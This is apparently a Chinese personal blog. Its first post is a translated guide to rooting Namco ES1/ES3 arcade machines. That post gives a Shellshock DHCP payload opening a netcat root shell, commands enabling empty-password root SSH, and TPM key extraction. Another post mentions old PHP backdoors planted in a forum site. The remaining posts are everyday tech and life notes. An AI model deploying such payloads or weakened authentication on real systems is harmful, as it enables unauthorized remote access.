Namco ES1/ES3(Linux) 越狱指南(翻译自 a12s 原帖)

1:06更新:发现一个介绍的更详细的安全越狱方法,各位翻墙看吧:A Medium Link。回头有机会翻译一下这一篇。

这篇文章主要介绍了 Namco 基于 Linux 开发的 ES1/ES3 系列平台的一种越狱方法,这篇文章说的工作非常基础,但是一旦获取权限,就可以进行包括救砖、显卡更换还有硬盘损坏修复等等工作。肌肉男这个家伙虽然有的时候有点怪,但是还是有干货的。
分享给各位。

P.S 笔者手懒, ES1/ES3 设备被我统称为 ESx 设备了,不是VMWare那个虚拟机啊,提前声明~

先题

不要将 ESx 的硬盘直接连接到 Windows 平台的计算机上,否则的话硬盘将变砖。
如果试图提取内容或修改其内容,请尝试使用对拷机制作副本或使用 Linux 平台操作。
如果你已经将硬盘插到 Windows 平台上了,请不要尝试再在 ESx 平台上开机,否则的话它将自杀。
(吐槽: 256 的硬盘也说是这样,原因是使用了 PS2 的 FAT12 文件系统, Windows 系统会尝试将它转换为 FAT16 文件系统,这样的后果就是变砖)

已验证游戏:
-Tank Tank Tank
-Dead Heat
-Dead Heat Riders
-Nirin

所需设备:

- 一台 Linux 设备 ( Windows 也可以,但是 Linux 会明显减轻你的工作量)
- ES1/ES3 Linux 主机一台
- 网线
- 虚拟机或隔离的 Linux 工作环境

步骤:

1)在 Linux 机器上安装 dhcpd ,若你现在的网络环境中有其他 DHCP 服务,比如家用路由器的话,请将之禁用。
2)如此配置 dhcpd ,当然,也可以绑定你的 ESx 设备的 MAC 地址,这样最安全。
option domain-name "() { :;}; /bin/nc -lp23 -c/bin/sh&";
3)将如下代码保存为一个文件(比如 <~/test.sh> ):
sed -i 's/nullok_secure$/nullok/' /etc/pam.d/common-auth
sed -i 's/.*PermitEmptyPasswords.*/PermitEmptyPasswords yes/' /etc/ssh/sshd_config
/etc/init.d/ssh restart

4)把 ESx 的 RJ45(网线口) 和这台 Linux 设备连接起来。
5)启动 ESx 设备,一旦可以 ping 通了,运行这条指令
cat <~/test.sh> | nc -q 23
6)然后就可以通过 SSH 链接到主机上。用户名: root 密码为空。
关于这一利用方法的详情:TrendMicro
(吐槽:妈的以后还是要看英文原版新闻,看国内媒体太浪费时间了)
7) ESx 系统大概在十几秒之后会中断所有网络连接(吐槽:霓虹的好多街机都这样,看向了 SEGAY 的这一堆洋垃圾),所以你得快点拷贝出机器的 TPM ( 吐槽: Trusted Platform Module ,可信计算模块,通过硬件加密为计算机内容器提供数据安全防护。为了这个全拼我还专门开了下百度,看来英文是确实不行了)密钥。
arcadeunsealkey /etc/arcade/sealkey

致谢:
-android 提供了 PCB
-匿名人士发现了这一方法

本文提供的方法首次发现于2015.6.11。

帝都安定日常记(三)

2017年,新年快乐。

首先是升级通告,把现在跑的 Google reCaptcha 替换成了国内的极验验证,速度会好一些。更重要的是,不需要翻墙了。
最后信仰还是没有战胜现实?这句话不止可以用在这件事上吧~
有机会还是要肉身翻墙。

最近的关键字
(一)键盘
当时在图吧淘的技嘉茶轴最终没能活过一年。淘宝买了小丑鱼的 Cherry 红轴扔在公司,手感还不错。键帽惨了点。不过价格摆在那里,有那个功夫换键帽不如想想怎么涨工资。
多说两句,技嘉这个键盘当时是因为某些问题京东下架才被不良商家拿来卖二手回本的。拆开看了下,线走的确实好,质量也过硬,但是板子不干净,而且主控芯片看上去不太好。为什么是看上去不太好呢?因为型号被打磨掉了。
靠键盘吃饭的人,对自己(的手)好一点。
我的3494
这是我的主力 3494 ,打开 WordPress 之前,我刚刚给它做了个清理。回头有机会搞把大 Flico 玩一下吧~

(二)阴阳师
因为什么原因入的坑来着。。想不起来了。前前后后勉强也算是轻度氪金玩家,一千多块。算上必出 SSR 一共 5 个,基本上符合 200 人民币一个 SSR 的价目表。单独列出来是因为这两天阴阳师出了个暴露出他们没有 QA 的事实的 bug 。在行业人员来看这次闹得纷纷扬扬的问题就不应该在线上的生产环境中出现,但是恰好他就出现了。看来中秋节那一波拿的60个月奖金估计就是提前发的年终奖了。
总结说过很多次了,这里重复一下:不是说你的美工和策划( PM )会写脚本了,就不需要 QA 和研发了。
另外一个阴阳师相关是元旦去了一趟 IDO20 。帝都的一个很普通的漫展。不过姑获鸟皮肤是在后面几天把欧皇神机大佬送去睡觉之后才出的。
会上弄到了一个水君扭蛋,一发入魂。挂到 3DS 上了。果然还是得回到 Pokemon 的坑里。
顺带一提,这扭蛋已经出厂 5 年了。莫名其妙想起了台北的扭蛋。是不是又该去一趟了?
或者,要不直接计划去 11 区一趟好了~
水君

(三) 精灵宝可梦相关
最近北京的 7-11 便利店和大陆的精灵宝可梦运营公司做了好多联名活动啊。近水楼台,顺手拿到了限定版的浴巾和其他周边。
然后终于把宝可梦·太阳的一周目过完了。有点肝不动了,但是看到片尾的 GF 还是觉得有点很感动呢。
宝可梦日一周目
说到精灵宝可梦,那就不得不提一下这篇文章说到的事情了。目前的进度:
·代码清理 Done
·代码修复 10%
--PokeDex Done
·其他 0%
哈哈,事有点多,慢慢来吧。

(四)街机收藏。
工作第一年我的绝大部分收入都贡献给了街机收藏。虽然有 maimai 私活作为补充但是还是捉襟见肘。 maimai Orange 泄露之后(大概今年下半年),我就绝少再涉足这块的收藏了。但是已有的收藏还是要慢慢补齐的,尤其是 Namco System 256 平台的太鼓达人系列。
元旦的时候没有按捺住洪荒之力,用了一个破天花板的价格买了日拍上少见的太鼓达人 9 街机版。这样的话,光盘版就差很早之前出掉的太鼓达人 11 日版,就收集齐了。
怎么能没有图呢!
颈椎病专治

最近其他的事情,都还算是没有结果的事情,以后有机会再聊吧。

依旧看不起Linux

最近因为某个小项目,又一头扎进了 Bay Trail 的天坑里。自从 Intel 把 Atom 系列的性能拉到了低端桌面平台的水平之后,越来越多的 x86 架构开发板就成了大家的选择(包括我)。不过毕竟 Intel 是商业公司,还是要赚钱的。所以目前绝大部分 Bay Trail 的平台都是 Windows (特别是 Windows 10)限定的。
当然,既然是 x86 那就没有不可能。因为这一平台限定使用 ia32 的 UEFI 方式启动,因此只要找到合适的 ia32 平台的 EFI bin ,就可以在板子上成功启动各种各样的 Linux 发行版。
这期间我参考的东西还真不少。

https://wyr.me/316.html
http://linuxiumcomau.blogspot.com/2016/10/running-ubuntu-on-intel-bay-trail-and.html
https://plus.google.com/+IanMORRISON/posts/UNWdwRMqy3j

其中 第二篇 中提及, Z3735f 主板的音频芯片在直到目前最新的 Linux 内核上依旧是有问题的。特别的在 Debian 发行版中,系统会将音频线路识别为一个叫做 Intel HDMI 的音频设备,导致的结果就是开发板上的 3.5mm 音频接口和 HDMI 均没有任何音频。根据相关资料和邮件(主要是 https://www.mjmwired.net/kernel/Documentation/sound/alsa/HD-Audio-Models.txt),尝试自行编译 4.9 的 Linux 内核,包括使用 Linuxium 的成品内核,均不能解决无法正确识别声卡的问题。
有点坑,早上起来去跟厂商要回了 Win 10 的镜像,晚上使用构建 PE 将板子刷回了 Win10 。
这期间的坑也挺大的。开发板客服显然有点业余,给我的 Win10 镜像是个 wim 封装,然而拆开看了一下里面的引导并不正确。
首先需要做一个板子可以引导的 ia32 uefi 的 PE 。我使用了无忧论坛的这个模板镜像和从网上随便下的一个 Win8 PE 。

PE ISO模板:度娘盘了个盘

然后把厂家的 wim 镜像拷到优盘里面进行安装。

然后,继续 Windows 呗。坑爹的 Bay Trail 。

开始一项浩大的历史工程

PokeTB.com 这个站,虽然当年没出什么正儿八经的力,好歹也是自己某些青春的见证了。
从一开始的 Discuz 2.5F 到后面正式上线的 4.1F 又到后面的 6.0Lite ,都是多谢小火( @lyzzzz )的努力。
还有 @youd 为 PTB 开发的宠物系统 以及撑起了改版一片天的花花(liuyanghejerry)。
至于我,普通的扫地工而已。

现在来看,最后一次对 PTB 的 Discuz 进行加固和升级应该是 2010 年前后的事情了。用现在的目光来看 PTB 整个的架构,可能会被很多人笑话。

Discuz 6.0 Lite GBK编码 (基于Discuz 6.0.0 和 Discuz 6.0.1F未正式发布版 + Ucenter v1)
若干自制插件
Ucenter v1

有问题就慢慢解吧。今天为 PTB 全站搭好了 git 仓库,第一步是清理整站代码。最早在梦游的时候,因为大家上网都不方便,我们自己在网站中埋了很多 PHP 木马之类的代码便于我们通过手机远程管理。首先要做的就是把这些后门清理掉,然后对代码进行梳理,格式化。GBK 编码转 UTF-8 我已经不奢望了,能让代码可用就可以了。
第二步的计划是让整站继续可用。目前发现的线上版本还有一些不能用的地方,比如PokeTB图鉴。这些也要慢慢的整理,修复。
第三步是为全站开一下https。对于一个十年代码还在跑的老站(主要原因是用了discuz这种中国特色的代码的站)将会是一个很大的挑战。

好了。列好了,慢慢填。

将博客的静态资源迁移到了七牛

最近实在是比较忙。高估了自己的能力。
现在主要是编码速度实在不尽如人意。以后针对这一点好好做一下训练吧。

最近抽空把博客速度慢的问题好好解决了一下。主要使用七牛云来作为主要的托管媒介。
细分一下这个需求的话分为如下两点:
1、域名未备案导致的解析速度缓慢,由于页面内存在比较多的本地资源,导致加载速度感人,手机上的表现是白屏,电脑上也时不时抽风。
2、图片资源使用七牛默认域名(测试域名),导致新版Chrome认为资源不安全,拒绝加载。
3、JS类库来自本地或海外cdn,速度感人。

于是花了大概十分钟的时间解决了一下这个问题。不得不说,七牛的工具虽然做的比较烂,但是能用。

现将步骤记录在这里。

1、WP侧安装插件七牛云储存
插件链接:https://wordpress.org/plugins/wpjam-qiniu/
也可以直接在后台搜索安装。
正常配置,填写AK和SK, 同时为你的储存区域分配一个SSL域名(这是要收钱的,不过4毛钱1G也就那样了吧),填写为你的加速域名

2、在服务器上下载七牛迁移工具(应该是同步工具)
https://qiniu.kf5.com/hc/kb/article/68954/
按照页面说明初始化,并将wp-contents和wp-include目录中的静态资源(css、js)按照路径,以分别的目录前缀(wp-contents/和wp-include/)上传到七牛云的储存空间。

然后就可以正常的享受这个加速了。

帝都日常(二)

1、Macbook Late 2016款
上周末去三里屯找花花浪的时候顺便去苹果店里体验了一把。眼睛看到的变化是拼音候选字在 touch bar 上。新的所谓蝶式键盘的手感……怎么说呢,有点像街机上用的电容弹片键盘。当然,你 Macbook 从来不讨论手感,逼格在那里呢。
顺带一提,我还是接着用 Thinkpad 吧,反正家里有台式机。

2、PageOne
这其实算是个意识吧,人挪活真的不无道理。虽然连着跑了两家 Pageone 之后,我发现大陆版的这家书店真的没法找到我想找的书,不过能知道家门口有这种东西,也足够了。

3、Steam
买了显卡自然是要开 Steam 坑了。目前比较常玩的两个游戏是 Sonic All Stars Racing Transform (还没有买dlc,游戏好难) 和 ICEY 。
对了,走过路过加个好友吧。
http://steamcommunity.com/id/ptbwoodu/

4、抹茶 Kitkat
首先感谢潘先生( @norinmura )在百忙学业之中还抽空来帝都聚一下,并带来了代购了半年的抹茶 Kitkat 。

其次,今天碰到一个很好玩的淘宝卖家。似乎是卖超量了又不愿意下架。在拍下后以每秒两次的速度修改商品价格导致不能完成付款,然后瞬间关闭交易。

5、搬砖
周末放空了一下,最近状态实在有点不太对。晚上稍微加了一下班就这个点了。明天继续努力吧。

帝都安定日常记(一)·客厅瘦客户端选择

来帝都租的第一个单间里面就有电视,虽然很老的 sharp ,也是可以好好利用起来的。
刚刚好,之前在古都遗留下来的一个挂机PC,可以兼任这个多媒体终端的任务。

在古都的时候,受条件所限,这个 Thin PC 主要的任务是挂机和提供简易 NAS 。软件和硬件的选择是这样的:


硬件:
机箱:撒哈拉 M1
电源:淘宝工包FSP 无风扇 SFX电源 配合淘宝SFX-ATX电源挡板
主板/CPU:翔升ASL J1900-HK
内存:威刚 4G 1333
硬盘: Sandisk X110 128G SSD (Primary)
      2 x ST 2T仓库盘(均拆自3.5寸外置硬盘盘芯)
软件:
Windows 7 Ultimate
uTorrent v3
Teamviewer

这一套在挂机上是没有什么问题的,还可以跑个简易的 http 服务器之类的玩个花样。但是,这个板子一直有个问题,就是对非 UEFI 系统不太友好。毕竟是个新 Skylake 架构的平台。

于是这次有一个新的需求,有几个老问题需要解决。


需求
1)增加稳定的输出需求,主板上自带的 HDMI 1.4 接口可以解决,输入问题可以通过无线键鼠解决。
问题
1)Win7->Win10
2)SSD 太大,浪费。
3)机箱过大,太轻,共振严重

老规矩,先上配置单。


硬件:
机箱:乔斯伯 C3
电源:鑫谷GP 600P 白金版(京东换新新品),本来原来电源可以接着用的。
主板/CPU:翔升ASL J1900-HK
内存:威刚 4G 1333
硬盘: Intel 330 40G SSD (Jubeat街机拆机品)
      1 x ST 2T仓库盘(不再需要那么大的空间)
软件:
Windows 10 Pro
uTorrent v3
Teamviewer
播放器Klite Codec Pack Standard with MPC

总体来看还是很满意的,不过还是有几个问题
1)没有了主板挡板,看上去好丑=。=
2)还是比书架宽了一点点。
但是这个机箱完全解决了硬盘共振的问题,40G SSD也满足了让机械硬盘在不工作的时候认真休息的需求。效果不错。

【相关链接】
主板评测:http://diy.pconline.com.cn/570/5707109.html
相关照片:


Github是万能的

起因是这样的。
早上 TK 教主转发了一个性感玉米的微博
tk-weibo

然后后面又转发了同链大神的这样一条微博
weibo-2

截至发文,这个已经在 github 上搜不到了,但是下面贴个截图证明我曾经搜到过:)

https://github.com/search?l=Java&q=%22api.id98.cn%22&ref=searchresults&type=Code&utf8=%E2%9C%93

github-search

我是觉得,github这个东西固然好,但是拿着公司的代码分享就不太合适了。

更换了一个页面里面的cdn源

昨晚顺手把文章发到了朋友圈里,朋友过来跟我说,手机上根本打不开。
看了下有可能导致速度很慢的原因,就只剩 Google 了。
reCaptcha 是 lazyload ,应该不会导致这个问题,最多只是无法评论。
那就是字体了。
翻看这个主题的源码,找到了罪魁祸首。
国内 cdn 找了好几家,看了下还是贵科大的比较叼。
USTC Blog强制对 Google 字体加速/

按照这个文章里面说的把字体的cdn改换过去,虽然速度一般,至少不会白屏了。

---------
更新:
https://gist.github.com/gaoyifan/680da074330d2c499d6b
按照官方博客里面的配置,发现在新版的 nginx 里面,关键字已经被修改为 sub_filter ,不再是复数形式。
修改后恢复了正常。

---------
更新:中科大源还是挂了。
换了360的公共源,直接修改了主题的CSS。

朋友们二三事

脑子里有几件一直记到现在的事情,和几群不同的朋友发生的。记一下。

08年的时候我还在读初三。那时候学校还不让带手机。
但是我跟班主任关系也不错,家里父母又都回家比较晚,在家门口上学的我出于联络方便的目的还是有了手机。
第一个手机印象还是很深的,诺记1116。
日子肯定不会错,2008年5月12号,汶川地震。当时我有订阅移动的短信新闻。下午放学后很久了,短信推到手机上,四川发生大地震。当时还没走,应该是马上要会考了,留下来做了点微小的工作(哪里不对)。
紧张的告诉当时一起做事情的朋友,结果他们一脸不相信的样子。大概是因为大家都没有经历过大型地震,觉得离自己很远。
结果,汶川地震,全国震惊。

还是08年。我得承认08年真的给我带来的影响很大。
八月中旬入学高中,因为自己本来就比较水的成绩心情不是很好。刚开学各种活动,刚好碰上了奥运会开幕式。
其实第一个手机用了没多久,刚入学就换了一个彩屏的三星手机。那个时候流量真的贵,10块钱40M,大家的标配浏览器还是Opera Mini,也没有Wifi,WAPI更是云里雾里的东西。
好在那个年代墙还没有这么高,有些不该看到的新闻还是可以很轻松看到的。
记得那时候国家刚出规定,说演出业假唱属于违法行为。
而08年奥运会开幕式,唱歌的不是妙可,演员是妙可。
那个年代大家也都还算单纯,甚至有点盲目地爱国。某天早上睡起觉来看到这条新闻,宿舍里面就爆发出来很严重的争吵。毕竟奥运会这种东西是非常需要政治正确的。
大家当然都不信。
后来,大家也就慢慢接受了。

高考完之后,我用了一个夏天的时间尝试做了一个不太成熟的实验。当然,肯定是没有成功的。
那个年代国内的民间配音还是一滩散沙。白客还在cucn201给搞笑漫画日和配音,国内所谓的中文配音基本都是现在网络直播的这种质量。
我把家里车库大概收拾了一下,想要尝试能不能自己也搞一个工作室。拉了一帮朋友,陪我跳这个坑。
最后的成品大概只有这个?
http://player.youku.com/player.php/sid/XMjgyNzc0NTY4/v.swf

顺带出了一个去人声的第一话,还有一个MAD。
现在想起来这整件事的策划就是不对的,整个导演的流程也都是错的。
其实更重要的错误是硬件完全跟不上,导致素材管理很乱,也没有办法好好的筛选,软件也不会用。

何况到了大一,直接把最重要的一块数据硬盘摔坏了,整个高中包括之前的重要的记忆全都毁于一旦。那块硬盘对我的重要程度太高了,以至于后来虽然赶上泰国洪水退回了当时购买价格接近3倍的维修款,我也依旧高兴不起来。

很多之前做的东西,只有优酷上有成品了……。

这也导致了我现在疯狂的屯硬盘。

人啊,果然还是一个慢慢成长的生物,之前经历的每一件事情都会对自己产生深远的影响啊。